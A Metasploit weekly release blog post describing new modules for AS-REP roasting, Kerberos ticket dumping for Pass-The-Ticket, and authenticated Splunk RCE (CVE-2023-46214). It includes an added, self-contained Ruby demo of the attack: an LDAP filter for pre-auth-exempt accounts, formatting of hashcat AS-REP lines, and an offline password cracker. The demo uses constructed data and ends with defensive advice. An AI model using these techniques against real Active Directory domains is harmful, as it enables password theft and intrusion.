Metasploit Weekly Wrap-Up: Dec. 15, 2023
Brendan Watters, blog.rapid7.com, Dec 15, 2023, 9:04 p.m.

Tags: metasploit, kerberos, asrep-roast, splunk, rce, smb session, ticket management, password hashes, vulnerability, windows host

Scores:
CVSS3: 8.8 High (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)
AI Score: 9.3 High (confidence: High)
CVSS2: 6.8 Medium (AV:N/AC:M/Au:N/C:P/I:P/A:P)
EPSS: 0.203 Low (percentile 95.9%)

Continuing the 12th Labor of Metasploit


Metasploit continues its Herculean task of increasing our toolset to tame Kerberos by adding support for AS-REP roasting. When an account has "Do not require Kerberos preauthentication" set in Active Directory (the DONT_REQ_PREAUTH bit of its userAccountControl attribute), the KDC answers an unauthenticated AS-REQ for that account with an AS-REP whose encrypted part is keyed from the user's password, so the response can be taken offline and cracked to recover the password. The setting is disabled by default, but it is enabled in some environments.

Attackers can request that material for any user with the option enabled, and worse (or better?), the directory will tell you which users those are: an LDAP query for the DONT_REQ_PREAUTH bit returns the list of affected accounts (the LDAP bind needs a domain account, unlike the AS-REQ itself). So not only can you get these crackable responses, the DC will tell you which users are vulnerable to the attack. Metasploit's AS-REP roasting module will either enumerate the users over LDAP and pull the authentication material for all of them, or pull it for a select set of users you supply.

Ticket Management

This week's release includes a brand new post module for enumerating and dumping Kerberos tickets from a compromised Windows host. The module copies all of the tickets that are accessible at the current privilege level into Metasploit's own cache, where they can then be used in a Pass-The-Ticket (PTT) style attack. This notably enables Metasploit users to execute the entire workflow needed to exploit Unconstrained Delegation from within Metasploit, and there is new documentation that outlines the whole process.

New module content (3)

Find Users Without Pre-Auth Required (ASREP-roast)

Author: smashery
Type: Auxiliary
Pull request: #18569 contributed by smashery
Path: gather/asrep

Description: This adds a module to gather credential material from accounts with "Requires Pre-Authentication" disabled. The module supports two mechanisms for choosing targets, brute forcing with a list of usernames or using an LDAP query to retrieve the relevant usernames, followed by requesting a TGT (an AS-REP) for each of them.
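The following Ruby example, added here and not taken from the Metasploit module, shows the three pieces behind the two paragraphs above and this module description: selecting roastable accounts out of an LDAP result set by the DONT_REQ_PREAUTH bit, turning an etype 23 AS-REP enc-part into the hashcat/john "$krb5asrep$23$" line, and the offline guess that makes the flag dangerous. To stay self-contained it also contains the KDC side (RFC 4757 RC4-HMAC encryption with a key-usage number of 8, which is what Windows applies to the AS-REP enc-part) and a plain-Ruby MD4 for the NT hash. The LDAP entries, the account password, the confounder and the plaintext are constructed; the LDAP filter is the standard bitwise-AND matching-rule form, and whether the module uses exactly that filter is not stated on the page. No network traffic is sent; the username-list mode of the module, which simply tries an AS-REQ per name, is not simulated.

```ruby
require 'openssl'

# Added example, not Metasploit's code. Sample data below is constructed.
UF_DONT_REQUIRE_PREAUTH = 0x400000 # userAccountControl bit for "Do not require Kerberos preauthentication"
ASREP_LDAP_FILTER = '(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))'
RC4_HMAC    = 23 # Kerberos etype rc4-hmac
ASREP_USAGE = 8  # key-usage number Windows uses for the AS-REP enc-part with etype 23

# Constructed stand-in for the result of the LDAP query.
SAMPLE_ENTRIES = [
  { sAMAccountName: 'alice',      userAccountControl: 0x200 },            # NORMAL_ACCOUNT
  { sAMAccountName: 'svc_backup', userAccountControl: 0x200 | 0x400000 }, # + DONT_REQ_PREAUTH
  { sAMAccountName: 'bob',        userAccountControl: 0x200 | 0x10000 }   # + DONT_EXPIRE_PASSWORD
]

MASK32 = 0xffffffff
def rotl32(x, n); ((x << n) | (x >> (32 - n))) & MASK32; end

# MD4 (RFC 1320) in plain Ruby: NT hashes are MD4(UTF-16LE(password)) and
# OpenSSL 3 only ships MD4 in its legacy provider.
def md4(msg)
  bitlen = msg.bytesize * 8
  data = msg.b + "\x80".b
  data << "\x00".b until data.bytesize % 64 == 56
  data << [bitlen & MASK32, bitlen >> 32].pack('V2')
  a, b, c, d = 0x67452301, 0xefcdab89, 0x98badcfe, 0x10325476
  rounds = [ # [boolean function, additive constant, word order, shift schedule]
    [->(x, y, z) { (x & y) | (~x & z) },          0,          (0..15).to_a,                                          [3, 7, 11, 19]],
    [->(x, y, z) { (x & y) | (x & z) | (y & z) }, 0x5a827999, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], [3, 5, 9, 13]],
    [->(x, y, z) { x ^ y ^ z },                   0x6ed9eba1, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], [3, 9, 11, 15]]
  ]
  data.unpack('V*').each_slice(16) do |words|
    aa, bb, cc, dd = a, b, c, d
    rounds.each do |fn, k, order, shifts|
      order.each_with_index do |i, j|
        a = rotl32((a + fn.(b, c, d) + words[i] + k) & MASK32, shifts[j % 4])
        a, b, c, d = d, a, b, c # rotate so the next step updates the next register
      end
    end
    a = (a + aa) & MASK32; b = (b + bb) & MASK32; c = (c + cc) & MASK32; d = (d + dd) & MASK32
  end
  [a, b, c, d].pack('V4')
end

def rc4(key, data)
  s = (0..255).to_a
  kb = key.bytes
  j = 0
  256.times { |i| j = (j + s[i] + kb[i % kb.size]) & 0xff; s[i], s[j] = s[j], s[i] }
  i = j = 0
  data.bytes.map do |byte|
    i = (i + 1) & 0xff
    j = (j + s[i]) & 0xff
    s[i], s[j] = s[j], s[i]
    byte ^ s[(s[i] + s[j]) & 0xff]
  end.pack('C*')
end

def nt_hash(password); md4(password.encode('UTF-16LE').b); end
def hmac_md5(key, data); OpenSSL::HMAC.digest('MD5', key, data); end

# KDC side (RFC 4757): the blob an AS-REP carries for a pre-auth-exempt user.
# The only secret that went into it is the user's NT hash.
def asrep_enc_part(password, plaintext, confounder)
  k1 = hmac_md5(nt_hash(password), [ASREP_USAGE].pack('V'))
  body = confounder + plaintext
  checksum = hmac_md5(k1, body)
  checksum + rc4(hmac_md5(k1, checksum), body)
end

# Attacker side 1: which accounts are roastable, from an LDAP result set.
def roastable(entries)
  entries.select { |e| (e[:userAccountControl] & UF_DONT_REQUIRE_PREAUTH) != 0 }
         .map { |e| e[:sAMAccountName] }
end

# Attacker side 2: hashcat mode 18200 / john krb5asrep line (checksum, then edata).
def asrep_hash_line(user, realm, enc_part)
  "$krb5asrep$#{RC4_HMAC}$#{user}@#{realm}:#{enc_part[0, 16].unpack1('H*')}:#{enc_part[16..].unpack1('H*')}"
end

# Attacker side 3: offline guessing. A candidate is right when its NT hash
# reproduces the HMAC over the decrypted body; the KDC is never contacted again.
def crack_asrep(line, wordlist)
  _, tag, etype, rest = line.split('$', 4)
  raise ArgumentError, 'only $krb5asrep$23$ lines are handled' unless tag == 'krb5asrep' && etype.to_i == RC4_HMAC
  _principal, checksum_hex, edata_hex = rest.split(':')
  checksum = [checksum_hex].pack('H*')
  edata    = [edata_hex].pack('H*')
  wordlist.find do |candidate|
    k1 = hmac_md5(nt_hash(candidate), [ASREP_USAGE].pack('V'))
    body = rc4(hmac_md5(k1, checksum), edata)
    hmac_md5(k1, body) == checksum
  end
end

if __FILE__ == $PROGRAM_NAME
  puts "LDAP filter: #{ASREP_LDAP_FILTER}"
  roastable(SAMPLE_ENTRIES).each do |user|
    blob = asrep_enc_part('Winter2023!', 'EncASRepPart-bytes', "\x00" * 8) # constructed secret and plaintext
    line = asrep_hash_line(user, 'CORP.LOCAL', blob)
    puts line
    puts "cracked: #{crack_asrep(line, %w[Summer2023! Password1 Winter2023!]).inspect}"
  end
end
```

The defensive reading is the mirror image of crack_asrep: because the checksum is an HMAC under a key derived only from the NT hash, nothing short of a strong password protects an account with this flag set, so the flag should be audited with the same LDAP filter and removed wherever it is not strictly required.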

Splunk Authenticated XSLT Upload RCE

Authors: Valentin Lobstein, h00die, and nathan
Type: Exploit
Pull request: #18577 contributed by Chocapikk
Path: unix/http/splunk_xslt_authenticated_rce

Description: This PR adds a Remote Code Execution (RCE) module for Splunk Enterprise using CVE-2023-46214. This module exploits a vulnerability in the XSLT transformation functionality of certain versions of Splunk Enterprise, allowing for authenticated remote code execution.

Kerberos Ticket Management

Authors: Spencer McIntyre and Will Schroeder
Type: Post
Pull request: #18488 contributed by zeroSteiner
Path: windows/manage/kerberos_tickets

Description: This PR adds a module to manage Kerberos tickets from a compromised host. This notably allows Kerberos tickets to be exported from the target and then added to Metasploit’s own cache, allowing them to be used for the duration in which they are valid.

Enhancements and features (3)

  • #18539 from dwelch-r7 - This adds a new session type for SMB sessions. The SMB session type is behind a feature flag and can be enabled by running "features set smb_session_type true" in msfconsole.
  • #18598 from bwatters-r7 - This bumps the metasploit-payloads version to bring in one fix and one enhancement. The fix standardizes the behavior of Java Meterpreter so that binding to 0.0.0.0 only listens on IPv4 interfaces. The enhancement better aligns the pretty OS names reported on Windows for kernel-10 releases (Windows Server 2016 and later, Windows 10 and 11).
  • #18601 from MikeAnast - Adds arm64 support to Metasploit's Dockerfile. The new image is available from Docker Hub via "docker pull metasploitframework/metasploit-framework:6.3.47" or through the wrapper script ./docker/bin/msfconsole.

Bugs fixed (4)

  • #18606 from Lorenyx - rpc_plugin has been updated to correctly use the provided plugin options.
  • #18609 from adfoster-r7 - This fixes an issue in the cmd/windows/powershell/download_exec payload module that was preventing it from executing correctly due to an architecture check.
  • #18613 from dwelch-r7 - Ensures that after listing files within an SMB directory that the handle is closed.
  • #18614 from sjanusz-r7 - Fixes a crash in the auxiliary/scanner/ssh/ssh_identify_pubkeys module, as well as adding new module documentation.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the commercial edition Metasploit Pro.
